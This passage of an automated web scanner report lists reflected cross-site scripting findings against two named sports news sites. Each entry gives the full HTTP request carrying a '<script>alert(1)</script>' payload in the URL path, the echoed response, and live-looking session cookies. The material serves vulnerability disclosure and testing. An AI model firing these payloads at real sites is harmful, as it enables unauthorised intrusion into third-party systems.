Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:42 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common57e8b<script>alert(1)</script>f39eff7e154/global_flash/player/player.php"</strong>
...[SNIP]...

2.179. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd281<script>alert(1)</script>15e0ecd7081 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flashbd281<script>alert(1)</script>15e0ecd7081/player/player.php HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:42 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flashbd281<script>alert(1)</script>15e0ecd7081/player/player.php"</strong>
...[SNIP]...

2.180. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55ff1<script>alert(1)</script>3b3a53d4fc8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player55ff1<script>alert(1)</script>3b3a53d4fc8/player.php HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:42 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player55ff1<script>alert(1)</script>3b3a53d4fc8/player.php"</strong>
...[SNIP]...

2.181. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3544c<script>alert(1)</script>c22839dba9c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php3544c<script>alert(1)</script>c22839dba9c HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:43 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php3544c<script>alert(1)</script>c22839dba9c"</strong>
...[SNIP]...

2.182. http://www.comcastsportsnet.com/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 235bb<script>alert(1)</script>3097e54bcbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/235bb<script>alert(1)</script>3097e54bcbb HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:41 GMT
Content-Length: 776
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/235bb<script>alert(1)</script>3097e54bcbb"</strong>
...[SNIP]...

2.183. http://www.comcastsportsnet.com/pages/main [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3384<script>alert(1)</script>cb66b36a9e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesf3384<script>alert(1)</script>cb66b36a9e6/main HTTP/1.1
Host: www.comcastsportsnet.com
Proxy-Connection: keep-alive
Referer: http://www.comcastsportsnet.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:38 GMT
Connection: close
Content-Length: 776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesf3384<script>alert(1)</script>cb66b36a9e6/main"</strong>
...[SNIP]...

2.184. http://www.comcastsportsnet.com/pages/main [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0707<script>alert(1)</script>573843f4b66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/mainc0707<script>alert(1)</script>573843f4b66 HTTP/1.1
Host: www.comcastsportsnet.com
Proxy-Connection: keep-alive
Referer: http://www.comcastsportsnet.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:38 GMT
Connection: close
Content-Length: 795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/mainc0707<script>alert(1)</script>573843f4b66"</strong>
...[SNIP]...

2.185. http://www.csnbaltimore.com/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload daf8e<script>alert(1)</script>e5f3917f7f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.htmldaf8e<script>alert(1)</script>e5f3917f7f9 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:54 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.htmldaf8e<script>alert(1)</script>e5f3917f7f9"</strong>
...[SNIP]...

2.186. http://www.csnbaltimore.com/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 34164<script>alert(1)</script>0648d394dfc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html34164<script>alert(1)</script>0648d394dfc HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:57 GMT
Content-Length: 816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html34164<script>alert(1)</script>0648d394dfc"</strong>
...[SNIP]...

2.187. http://www.csnbaltimore.com/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1b173<script>alert(1)</script>8c0b83a496b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html1b173<script>alert(1)</script>8c0b83a496b HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:58 GMT
Content-Length: 818
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html1b173<script>alert(1)</script>8c0b83a496b"</strong>
...[SNIP]...

2.188. http://www.csnbaltimore.com/12/12/10/Ravens-Texans-The-basics/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/12/10/Ravens-Texans-The-basics/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bb8c0<script>alert(1)</script>2ad29b4003b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/12/10/Ravens-Texans-The-basics/landing.htmlbb8c0<script>alert(1)</script>2ad29b4003b HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:02 GMT
Content-Length: 804
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/12/10/Ravens-Texans-The-basics/landing.htmlbb8c0<script>alert(1)</script>2ad29b4003b"</strong>
...[SNIP]...

2.189. http://www.csnbaltimore.com/12/16/10/Franklin-finally-heads-to-Vandy/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/16/10/Franklin-finally-heads-to-Vandy/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 75610<script>alert(1)</script>2b8065799c8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Franklin-finally-heads-to-Vandy/landing.html75610<script>alert(1)</script>2b8065799c8 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:59 GMT
Content-Length: 811
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Franklin-finally-heads-to-Vandy/landing.html75610<script>alert(1)</script>2b8065799c8"</strong>
...[SNIP]...

2.190. http://www.csnbaltimore.com/12/16/10/New-sports-arena-for-Baltimore-/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/16/10/New-sports-arena-for-Baltimore-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c4947<script>alert(1)</script>b18abeac900 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/New-sports-arena-for-Baltimore-/landing.htmlc4947<script>alert(1)</script>b18abeac900 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:58 GMT
Content-Length: 811
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/New-sports-arena-for-Baltimore-/landing.htmlc4947<script>alert(1)</script>b18abeac900"</strong>
...[SNIP]...

2.191. http://www.csnbaltimore.com/12/16/10/Will-Ravens-respond-to-Saints/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/16/10/Will-Ravens-respond-to-Saints/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a08ac<script>alert(1)</script>3fd554facc0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Will-Ravens-respond-to-Saints/landing.htmla08ac<script>alert(1)</script>3fd554facc0 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:02 GMT
Content-Length: 809
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Will-Ravens-respond-to-Saints/landing.htmla08ac<script>alert(1)</script>3fd554facc0"</strong>
...[SNIP]...

2.192. http://www.csnbaltimore.com/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3db20<script>alert(1)</script>bb2d756dbfb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html3db20<script>alert(1)</script>bb2d756dbfb HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:04 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html3db20<script>alert(1)</script>bb2d756dbfb"</strong>
...[SNIP]...

2.193. http://www.csnbaltimore.com/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 77970<script>alert(1)</script>52d6f2862ce was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html77970<script>alert(1)</script>52d6f2862ce HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:05 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html77970<script>alert(1)</script>52d6f2862ce"</strong>
...[SNIP]...

2.194. http://www.csnbaltimore.com/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d2fad<script>alert(1)</script>b7678c4d177 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.htmld2fad<script>alert(1)</script>b7678c4d177 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:04 GMT
Content-Length: 815
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.htmld2fad<script>alert(1)</script>b7678c4d177"</strong>
...[SNIP]...

2.195. http://www.csnbaltimore.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dbfd4<script>alert(1)</script>a999fa7914c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmldbfd4<script>alert(1)</script>a999fa7914c HTTP/1.1
